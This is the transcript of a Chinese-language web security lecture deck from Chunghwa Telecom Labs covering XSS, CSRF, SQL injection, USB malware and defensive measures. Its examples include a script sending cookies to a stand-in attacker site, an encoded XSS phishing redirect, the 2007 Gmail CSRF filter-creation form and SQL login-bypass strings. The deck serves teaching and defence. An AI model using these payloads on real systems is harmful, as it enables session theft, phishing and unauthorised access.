Upload
juliet-sanford
View
125
Download
4
Embed Size (px)
DESCRIPTION
資通安全的實務面與安全機制. 中華電信研究所 資通安全研究室. 問題在哪裡 ?. 資料來源 : TrandMicro. 過去一年內,被植入惡意程式的國內網站達 383 個, 純粹遭入侵的網站則高達 1,483 個. 安全問題被重視. 80Port 的攻擊. 圖檔資料來源 : TrandMicro. 竊取資料. 殭屍網路 惡意連結. 瀏覽網頁. 取得資料. SQL injection. 5. 竊取資訊至伺服器. 4. 植入惡意程式碼. 3. 背景導向惡意連結. 2. 植入惡意連結. 藉由 HTTP 散播的攻擊手法. 瀏覽者. 知名網站. 犯罪者. - PowerPoint PPT Presentation
Citation preview
1
-TL Proprietary-
資通安全的實務面與安全機制
中華電信研究所 資通安全研究室
2
-TL Proprietary-
80Port
的攻擊
問題在哪裡 ?
過去一年內,被植入惡意程式的國內網站達 383個,純粹遭入侵的網站則高達 1,483 個
資料來源 : TrandMicro
安全問題被重視
圖檔資料來源 : TrandMicro
3
-TL Proprietary-
藉由 HTTP 散播的攻擊手法
知名網站
瀏覽者
3. 背景導向惡意連結
2. 植入惡意連結1. 攻擊網站漏洞
4. 植入惡意程式碼
5. 竊取資訊至伺服器
殭屍網路惡意連結
SQL injection
瀏覽網頁
竊取資料
犯罪者
取得資料
Web Threats !!資料來源 : TrandMicro
4
-TL Proprietary-
常見的威脅
5
-TL Proprietary-
網路安全威脅及其解決方案威脅 解決方法 解決方案
冒用 強化用戶身分識別 密碼憑證 OTP智慧卡生物識別
滲透 強化伺服器入侵偵測弱點檢測
修正檔管理防火牆入侵防禦系統入侵偵測系統弱點評估
阻斷服務 封包過濾 入侵防禦系統入侵偵測系統防火牆
中斷 Tunneling IPSec VPNSSL VPN專線
6
-TL Proprietary-
網路安全威脅及其解決方案 ( 續 )
威脅 解決方法 解決方案
竊聽 加密
隔離網路
SSLIPSec虛擬鍵盤防火牆VPN
違反授權 權限管理
實體隔離
ID Management稽核防火牆機房管理
否認 使用不可否認性的交易協定 SSLSET
網路釣魚 強化網站識別瀏覽器防護
網站憑證修正檔管理
7
-TL Proprietary-
攻擊的 3 大主流與防衛 4 大構面
攻擊
近年來攻擊目標已集中在 Web AP( 網站 )攻擊、 Phising 、無線網路攻擊以及 USB病毒
防衛
8
-TL Proprietary-
Web AP( 網站 ) 安全
太多攻擊SQL Injection, XSS, Phising…
Source Code Scan
(Code Review)
IPS/Web AP FireWall
Vulnerability Audit
網站防竄改系統
IDC 統計 : 超過 75% 的網路資安事件是針對 Web 應用程式
而來06 年底無名小站遭 XSS 攻擊
…Microsoft 人 員 必讀
Penetration Test
9
-TL Proprietary-
網路 主機 應用程式
版本更新服務最小化
ex: Port 80.443
避免使用預設密碼
程式撰寫準則
版本更新
靜態檢查( 原始碼檢測 )
動態檢查( 沙箱測試、錯
誤植入測試 )
網路 主機 應用程式
更新設備 版本更新備援機制 檢視與分析日誌
記錄
版本更新弱點掃描滲透測試備援機制
備援機制
維護階段之安全設定
架設系統階段之安全設定Web AP 安全設定
Web AP Firewall / IDS
10
-TL Proprietary-
網站程式開發安全過濾
使用者輸入內容
妥善處理錯誤訊息容
檢查上傳內容
敏感資訊要妥善處理
將密碼以編碼方式儲進資料
庫
前後、端都要檢查
使用者輸入
11
-TL Proprietary-
XSS(Cross-Site Scripting) Injection
為了與 CSS(Cascading Style Sheet) 區別 將此縮寫為 XSS那有沒有 CSS 攻擊 ? YES CSS 重新定義讓 User 不查點選
惡意攻擊者往 Web 頁面裏插入惡意 html 代碼,當用戶瀏覽該頁之時,嵌入其中 Web 裏面的 html 代碼會被執行,從而達到惡意用戶的特殊目的
使加密連線失效,駭客竊取使用者的個人資料。 駭客可冒用使用者身分,存取具身分控管機制的網站。 重導瀏覽器連線釣魚網站,以騙取帳號密碼等個人資訊。 將使用者瀏覽器導向惡意網站,下載並安裝惡意後門程式
於使用者電腦中。 導致使用者瀏覽器無法正常運作。
XSS was discovered on or before 1996
12
-TL Proprietary-
XSS 例子Rick 是一個惡意的使用者,他在 Joe 的網站註冊了個帳號並且完成他的個人資料頁面填寫。在他的個人資料中包含了下面這樣一段文字:<script>alert('Hello World');</script>
當 Joe ( 或其他人 ) 瀏覽 Rick 的個人資料,他就會看到一個討厭的彈出式視窗
Rick 有點狡猾,在 Joe 網站上的 BLOG 評論放置了下面這樣的程式碼:
<a href="/usercp.php?action=logout"> 一個關於貓的網頁 </a>
當 Joe ( 或其他人 ) 點選了連結,以為會看到一個關於貓的網頁,卻會因此登出這個網站
Rick 在 Joe 頁面上的留言放入了下面程式碼:
<script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>
當 Joe ( 或其他人 ) 瀏覽留言板,他就會被引導到 Rick 的網站。麻煩的是, Joe 瀏覽器紀錄連線資訊的 cookie 被當作網址的一部分傳遞到 Rick 的網頁伺服器。
13
-TL Proprietary-
XSS 攻擊手法 釣魚 竊取
HTMLEvilScript
Mail 告訴您有“好處”馬上去
HTMLEvilScript
HTMLEvilScript`
HTML
HTML
HTML
14
-TL Proprietary-
XSS 釣魚 實例網 站 原 始 頁 面 : 網 址 http://1X.XX.XXX.3/mXX/frame.jsp 會 自 動 導 到http://1X.XX.XXX.3/mXX/index.jsp
使 用 javascript 的 script 方式測試弱點型態
反射內容剛好在 <frame> 內的 src 標籤,因此判斷應該使用這項特性配合釣魚攻擊來滲透。
在 http://10.144.118.230:8080/ 下設置兩支程式fish-login.jsp 及 cachepswd.jsp
http://1X.XX.XXX.3/mXX/frame.jsp?url=%68%74%74%70%3a%2f%2f%31%30%2e%31%34%34%2e%31%31%38%2e%32%33%30%3a%38%30%38%30%2f%66%69%73%68%2d%6c%6f%67%69%6e%2e%6a%73%70
帳號密碼已被竊取
http://1X.XX.XXX.3/mXX/frame.jsp?url=http://10.144.118.230:8080/fish-login.jsp
15
-TL Proprietary-
CSRF(XSRF) Cross-site Request Forgery
跨站冒名請求
A CSRF attack forces a logged-on victim’s browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim.
OWASP TOP 10 2007
The first CSRF was documented in May 2000!
Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, Automation Attack
16
-TL Proprietary-
CSRF 實例 Gmail 事件 2007-09
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&[email protected]&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
<html><body><form name="form" method="POST" enctype="multipart/form-data"action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"><input type="hidden" name="cf2_emc" value="true"/><input type="hidden" name="cf2_email"value="[email protected]"/><input type="hidden" name="cf1_from" value=""/><input type="hidden" name="cf1_to" value=""/><input type="hidden" name="cf1_subj" value=""/><input type="hidden" name="cf1_has" value=""/><input type="hidden"name="cf1_hasnot" value=""/><input type="hidden" name="cf1_attach" value="true"/><input type="hidden" name="tfi" value=""/><input type="hidden" name="s" value="z"/><input type="hidden" name="irf" value="on"/><input type="hidden" name="nvp_bu_cftb" value="Create Filter"/></form><script>form.submit()</script></body></html>
資料來源 : CLIENT-SIDE SECURITYOverview of various Client-Side Hacking Tricks and Techniques
17
-TL Proprietary-
XSS and CSRF
The first CSRF was documented in May 2000!
XSS was discovered on or before 1996
Did it really take around 4 years for us to discover CSRF?
CSRF某程度上是一種 XSS 的應用 !CSRF 的要素 : User登入 /壞人偽造 Request
Javascript Hijacking某程度上是一種 CSRF 的應用 !
以上的說法僅為基本實務上的認知,不盡然為正確 ! 目前較嚴謹的定義可參考 OWASP Top Ten
18
-TL Proprietary-
Javascript Hijacking許多網站皆引入 Web 2.0 的概念,大量使用 Ajax 與 JSON 技術,透過非同步載入資料的方式,提供許多互動功能。這些載入資料就是 JavaScript Hijacking 的目標。
JSON
http://blog.roodo.com/rocksaying/archives/2955557.html
Script 連結 繼承物件 取出資料
19
-TL Proprietary-
XSS and CSRF 圖說
引誘你點選連結
偽造原使用者置入 Gmail Filter 規則 , 使原使用者的 Gmail 信件都轉寄到指定的地方或直接取得原使用人的通訊錄
引誘你點選連結 Gmail CSRF 漏洞 (2007-09)
20
-TL Proprietary-
CSRF 防範Ensure that there are no XSS vulnerabilities in your application
Insert custom random tokens into every form and URL
安全碼 / One Time Password
For sensitive data or value transactions, re-authenticate or use transaction signing
Do not use GET requests (URLs) for sensitive data or to perform valuetransactions
POST alone is insufficient a protection
21
-TL Proprietary-
SQL InjectionSQL Injection (SQL 指令植入式攻擊 , 資料隱碼攻擊 ) ,屬於 Input
Validation 的問題。SQL Injection 攻擊法並非植入電腦病毒,它是描述一個利用寫入特殊 SQL
程式碼攻擊應用程式的動作。
select * from member where UID =' "& request("ID") &" ‘ And Passwd =' "& request("Pwd") & " '
若攻擊者已知系統中有一個 Admin 的管理者帳號,則輸入 Admin '-- , 則 Server端程式將之處理成 select * from member where UID =' Admin '-- ‘ And Passwd =' ' 此意謂 : 可不須輸入密碼而進入資料庫 -- 符號後的任何敘述都會被當作註解
( 以上面為例, And子句將被 SQL 視為說明用 )
22
-TL Proprietary-
正常連線狀態
資料來源 : 網頁的危機與防禦 賴溪松 教授
23
-TL Proprietary-
SQL Injection 攻擊
使用者帳號 ' or 1=1 -- ,密碼 asdf1234(任意輸入 )
資料來源 : 網頁的危機與防禦 賴溪松 教授
24
-TL Proprietary-
final String custID = httpRequest.getParameter("custID"); final String sql = “Select * From Customer Where CustomerID = ‘” + custID + “ ’ "
Select * From Customer Where CustomerID = 'cust1' or 1=1 -- '
25
-TL Proprietary-
防止 SQL Injection 建議事項
查詢參數過濾過濾特殊字元輸出驗証
限制輸入格式密碼 (A~Z, 0~9)Email Address
輸入長度檢查最大輸入字串長度檢查
Error Handling 資料庫權限設定
個別資料庫 Role 與 Login/User 。
26
-TL Proprietary-
防止 SQL Injection 實務例 ASP SqlCheckInclude.asp http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx
<!--#include file="SqlCheckInclude.asp"-->
<% Response.Write("Welcome to the Test Page.")
Response.Write("If you are seeing this page then SQL validation succeeded.")
%> Java/JSP 使用 PreparedStatement
mod_security 是 Apache 的一個模組可以提供入侵偵測及防禦,它就如同是 web 應用程式的防火牆可以用來抵擋知名及不知名的攻擊如 SQL injection attacks 、 cross-site scripting 、 path traversal attacks
http://www.unixwiz.net/techtips/sql-injection.html
27
-TL Proprietary-
軟體開發之資訊安全管理問題
SDLC SecSDLC System Development Life
設計階段 程式開發階段
測試階段
產品銷售 /維護階段
教育訓練
概念 完成設計 測試計畫 完成程式 完成測試 上線 /銷售
安全小組查核
安全程式開發準則 白箱測試黑箱測試
28
-TL Proprietary-
28
Microsoft Team Developer 程式碼分析工具 (Static code analysis) 效能分析工具 高度整合 Unit testing 及 Code coverage工具 Microsoft 內部開發相關產品所採用的工具
J2EE PHP ASP
IBM Rational AppScan
29
-TL Proprietary-
Client 端安全與上網安全
安裝反間諜軟體
安裝反毒軟體
安裝更新檔
不下載沒簽章的元件
釣魚網站網頁木馬
不當下載 …
不到列為黑名單的網站
不隨意下載資料
2008/05/06Yahoo整合McAfee SiteAdvisor 到期 Search 中
30
-TL Proprietary-
上網時問題網站提醒
只是一種參考與提醒只是一種參考與提醒
31
-TL Proprietary-
終端防護
Safed End-Point Device
32
-TL Proprietary-
關於 USB 的防護 USB 病毒主要是利用 autorun.inf 將病毒植入電腦主機,或反
向從遭感染的主機把病毒散播到各種 USB介面的儲存裝置中。就是因為具有這種雙向傳遞的方式,病毒才能在電腦及USB儲存裝置中不斷擴散,而 autorun.inf 就是最主要的媒介。
身邊的所有的 USB 儲存裝置,都要清查裡頭是否有兩個隱藏檔
Autorun.infntdelect.com
防護測試1. Autorun.inf 的唯讀資料夾 ----- OK
2. 機碼啟動隨身碟的唯讀功能 --- 無效3. shift 鍵開啟隨身碟 ---------------- 無效4. 隨身碟磁區上右鍵開啟檔案總管 ------------- 無效5. 機碼關掉自動啟動功能 -------------------------- 無效
Wow! USB Protector
OpenSource
Ruby
33
-TL Proprietary-
NAC(Network Access Control) 架構
34
-TL Proprietary-
通道安全
Sniffer 竊聽 無線網路安全
SSL
uGate SSL
WiFi WPA 加密
IDS/IPS
35
-TL Proprietary-
防衛 4 大構面的安全架構
政策面
技術面
稽核面
教育面
上線檢查系統 資安規範自檢
資安規範自檢 弱點掃瞄 滲透測試
原始碼掃瞄
舉辦資安教育訓練
IRMAS PKI NIAS SSO
帳號集中 防毒軟體 OTP登入
弱點掃瞄
滲透測試資安委員會
…
36
-TL Proprietary-
安全的第一步 -- 政策面落實即將上線系統
上線檢查系統
安全檢測
效能檢測…
已上線系統 資安規範自檢
弱點掃瞄
滲透測試
IRMAS Server版
針對 Web Ap 系統的安全預先防衛針對資安規範進行全面例行檢查
原始碼掃瞄
LDAP 密碼政策與查驗
IRMAS: 針對 Client端進行安全檢查
Symantec: 針對 Client端進行防毒
37
-TL Proprietary-
技術面 -- 常見的威脅與防衛措施
IRMAS
防毒軟體
NIAS SSO IC 卡登入
兩階段登入
圖形密碼
IDS/IPS
IRMAS
uGate SSL VPN
OTP登入
弱點掃瞄 / 滲透測試
38
-TL Proprietary-
稽核面 -- 定期或即時弱點掃瞄分析與補強
網路安全
系統安全
網路應用安全(Web AP)
無線網路安全
上線系統安全檢查定期掃描資安規範自檢
即時安全監控處理 SOC
39
-TL Proprietary-
滲透測試 V.S. 駭客攻擊 駭客只需知道 ( 點 )
How :如何入侵 ? Why : 為什麼可以入侵成功
滲透測試則需要知道 ( 面 ) How :如何進行入侵 Why : 為什麼可以入侵成功 What :探測什麼 Which :需要哪些條件或工具 When :什麼是最好時機
只需找到一種入侵的方法
各種潛在可能入侵成功的方法 /甚至進行驗證
資料來源 : 網頁的危機與防禦 賴溪松 教授
40
-TL Proprietary-
滲透測試 V.S. 弱點掃描 弱點掃描使用自動化的掃描工具檢查伺服器上的安
全弱點 不真正執行弱點攻擊程式 測試已知的系統安全弱點只是滲透測試的一個步驟
滲透測試不只是掃描,同時亦試驗攻擊程式以取得遠端伺服器的控制真正執行弱點攻擊程式 包含完整的入侵及人和試探可能的系統弱點的存在
資料來源 : 網頁的危機與防禦 賴溪松 教授
41
-TL Proprietary-
何種安全機制之組合比較安全 ?
電腦安全設定檢查
IRMASUSB Lockdown
3G 網卡 /Modem Lockdown
USB Virus Detector
節能管理
修正檔管理防毒軟體安裝風險程式
NIAS SSO 與帳號集中管理
手機 OTP
Client端
安全設定準則 弱點分析
滲透測試 原始碼檢查
落實資安規範
IRMAS Server版 Agent開發
圖形影像密碼與兩階段密碼
uGate SSL VPN
IDS/IPS
Web AP/Server
開發中已完成
研究或待引進
42
-TL Proprietary-
Books
43
-TL Proprietary-
網站資源
44
-TL Proprietary-
可以研究與發展的課題 中文與知識安全碼
3X6+7=
打狗是指現在的哪裡
光
明
25
高雄
45
-TL Proprietary-
可以研究與發展的課題 Graphic Password
Pass-Go 2006
http://www.passgo.net/
Pass-Go 2006
http://www.passgo.net/
User畫上點或形狀及其位置為輸入資訊避免鍵盤測錄、避免網路竊聽並提高複雜度
User畫上點或形狀及其位置為輸入資訊避免鍵盤測錄、避免網路竊聽並提高複雜度
46
-TL Proprietary-
網站識別標幟設定好圖章後,登入一旦發現圖章消失,請提高警覺
Yahoo Sign-in Seal : 只能用同一 Browser 且同一電腦
兩階段帳號密碼 : 完美而無上述問題
47
-TL Proprietary-
可以研究與發展的課題 兩階段帳號密碼
IDPassword
ID
Password
比 Yahoo 安全圖章厲害( 可以在不同電腦上使用 )
1. 網路釣魚2.Off line破解
1. 網路釣魚2.Off line破解X
User自定圖章
1.先輸入 ID 以及提示的安全碼2.確認回傳的圖是您原先所指定的圖再輸入密碼
48
-TL Proprietary-
可以研究與發展的課題
WebGoatWebScarab
Wow!USB Protector
Nikto
BlueTooth 安全NFC手機安全
無線網路安全
Web 網路安全
資安攻擊技術攻擊行為分析技術
49
-TL Proprietary-
謝謝指教 !